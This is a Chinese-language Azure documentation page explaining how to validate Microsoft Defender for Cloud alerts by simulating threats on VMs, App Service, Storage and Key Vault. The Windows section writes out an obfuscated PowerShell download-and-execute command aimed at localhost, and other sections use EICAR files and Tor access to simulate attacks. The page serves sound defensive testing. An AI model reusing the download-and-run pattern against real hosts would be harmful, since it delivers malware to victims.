验证 Microsoft Defender for Cloud 中的警报

重要

注意:根据世纪互联发布的公告2026 年 8 月 18 日,中国地区的 Azure 中将正式停用所有 Microsoft Defender for Cloud 功能。

本文介绍如何验证系统是否已配置为Microsoft Defender for Cloud警报,以便监视和响应威胁。

什么是安全警报?

警报是指 Defender for Cloud 在资源上检测到威胁时生成的通知。 安全中心会按优先级列出警报,同时还会提供所需信息以快速调查问题。 Defender for Cloud 还提供关于针对攻击采取补救措施的建议。

有关详细信息,请参阅 Defender for Cloud 中的安全警报管理和响应安全警报

先决条件

若要接收所有警报,计算机和连接的 Log Analytics 工作区需位于同一租户。

生成示例安全警报

如果你使用的是在 Microsoft Defender for Cloud 中管理和响应安全警报中所述的新预览警报体验,则可以通过在 Azure 门户的“安全警报”页中创建示例警报。

创建示例警报

可使用示例警报来:

  • 评估 Microsoft Defender 计划的价值和功能。
  • 验证针对安全警报所做的任何配置,例如安全信息和事件管理(SIEM)集成、工作流自动化和电子邮件通知。

创建示例警报:

  1. 以具有“订阅参与者”角色的用户身份,从安全警报页上的工具栏中选择“示例警报”。
  2. 选择订阅。
  3. 选择要查看其警报的相关 Microsoft Defender 计划。
  4. 选择“创建示例警报”。

显示在 Microsoft Defender for Cloud 中创建示例警报的步骤的屏幕截图。

此时将显示一条通知,告知已创建示例警报:

显示正在生成示例警报的通知的屏幕截图。

几分钟后,警报将出现在“安全警报”页中。 它们还会显示在您配置为接收 Microsoft Defender for Cloud 安全警报的其他位置(如已连接的 SIEM、电子邮件通知等)。

显示“安全警报”列表中的示例警报的屏幕截图。

提示

这些警报针对模拟资源。

模拟Azure虚拟机(VM)(Windows) 上的警报

在开始之前,请确保Microsoft Defender for Endpoint在启用 Real-Time 保护的情况下运行。 若要验证此设置,请参阅 Microsoft Defender 防病毒中的 配置实时保护。

Microsoft Defender for Endpoint代理作为服务器集成Defender的一部分安装在计算机上后,请在要模拟受攻击资源的计算机上执行以下步骤。

打开设备上提升的命令行提示符,然后运行脚本:

  1. 转到“启动”,然后键入“cmd”。

  2. 右键选择“命令提示符”并选择“以管理员身份运行”。

    显示在哪里选择“以管理员身份运行”的屏幕截图。

  3. 在提示符下,复制并运行以下命令:powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'

  4. 命令提示符窗口自动关闭。 如果操作成功,10 分钟内应会在 Defender for Cloud 的“警报”边栏中显示一条新警报。

  5. PowerShell 框中的消息行应显示得与此处的呈现方式类似:

    显示 PowerShell 消息行的屏幕截图。

或者,可以使用 EICAR 测试字符串来执行此测试。 创建文本文件,粘贴 EICAR 行,并将该文件另存为可执行文件到计算机的本地驱动器。

模拟Azure虚拟机(VM)(Linux)上的警报

在开始之前,请确保Microsoft Defender for Endpoint在启用 Real-Time 保护的情况下运行。 若要验证此设置,请参阅 Microsoft Defender 防病毒中的 配置实时保护。

在您的电脑上安装作为 Defender for Servers 集成部分的 Microsoft Defender for Endpoint 代理后,请从您希望被指定为警报攻击目标的电脑执行以下步骤:

  1. 打开“终端”窗口,复制并运行以下命令:curl -O https://secure.eicar.org/eicar.com.txt
  2. 命令提示符窗口自动关闭。 如果操作成功,10 分钟内应在 Defender for Cloud 的“警报”边栏中出现一条新警报。

模拟 Kubernetes 上的警报

Defender for Containers 为群集和基础群集节点提供安全警报。 容器Defender监视控制平面(API 服务器)和容器化工作负荷。

可以使用 Kubernetes 警报模拟工具模拟控制平面和工作负载的警报。

详细了解如何使用 Microsoft Defender for Containers 保护 Kubernetes 节点和群集。

模拟应用服务的警报

可以对在应用服务上运行的资源模拟警报。

  1. 创建一个新网站,并等待 24 小时,以便新网站向 Defender for Cloud 注册,也可以使用现有网站。
  2. 创建网站后,使用以下 URL 访问该网站:
    1. 打开应用服务的资源窗格,并从“默认域”字段中复制该 URL 的域名。

      显示复制默认域的位置的屏幕截图。

    2. 将网站名称复制到 URL:https://<website-name>.chinacloudsites.cn/This_Will_Generate_ASC_Alert

  3. 警报在大约 2 到 4 小时内生成。

模拟 Storage ATP(高级威胁防护)警报

若要验证存储Microsoft Defender的威胁检测,请完成以下步骤:

  1. 导航到已启用适用于存储的 Azure Defender 的存储帐户。

  2. 选择侧边栏中的容器选项卡。

    屏幕截图显示从何处导航以选择容器。

  3. 导航到现有容器或创建新容器。

  4. 将文件上传到该容器。 避免上传任何可能包含敏感数据的文件。

    屏幕截图显示从何处将文件上传到容器。

  5. 右键单击已上传的文件,然后选择“生成 SAS”。

  6. 选择“生成的 SAS 令牌和 URL”按钮(无需更改任何选项)。

  7. 复制生成的 SAS URL。

  8. 打开 Tor 浏览器下载页 并安装 Tor 浏览器。

  9. 在 Tor 浏览器中,导航到 SAS URL。 现在,你应该会看到并可下载已上传的文件。

测试 AppServices 警报

模拟应用服务的 EICAR 警报:

  1. 通过转到应用服务网站的 Azure 门户边栏选项卡或使用与此网站关联的自定义 DNS 条目来查找该网站的 HTTP 终结点。 (Azure 应用服务网站的默认 URL 终结点具有后缀 https://XXXXXXX.chinacloudsites.cn)。 该网站应该是现有网站,而不是在警报模拟之前创建的网站。
  2. 通过转到应用服务网站的 Azure 门户边栏选项卡或使用与此网站关联的自定义 DNS 条目来查找网站的 HTTP 终结点。 (Azure 应用服务网站的默认 URL 终结点具有后缀 https://XXXXXXX.chinacloudsites.cn)。 该网站应该是现有网站,而不是在警报模拟之前创建的网站。
  3. 浏览到网站 URL,并向其添加以下固定后缀:/This_Will_Generate_ASC_Alert。 URL 应如下所示:https://XXXXXXX.chinacloudsites.cn/This_Will_Generate_ASC_Alert。 生成警报可能需要一些时间(大约 1.5 小时)。

验证 Azure 密钥保管库 威胁检测

若要验证Azure 密钥保管库威胁检测,请完成先决条件,然后按照以下步骤操作:

先决条件

验证步骤

若要验证 Azure 密钥保管库 的威胁检测功能:

  1. 创建密钥保管库和机密后,转到可访问 Internet 的 VM 并下载 TOR 浏览器
  2. 在 VM 上安装 TOR 浏览器。
  3. 安装后,打开常规浏览器,登录到 Azure 门户,然后访问“密钥保管库”页。 选择突出显示的 URL 并复制地址。
  4. 打开 TOR 并粘贴此 URL(需要再次进行身份验证才能访问 Azure 门户)。
  5. 访问后,还可以在左窗格中选择“机密”选项。
  6. 在 TOR 浏览器中,从 Azure 门户退出登录,然后关闭浏览器。
  7. 一段时间后,Defender for 密钥保管库 将触发警报,警报中提供了有关此可疑活动的详细信息。

后续步骤

本文介绍了警报验证过程。 熟悉该验证以后,请阅读以下文章: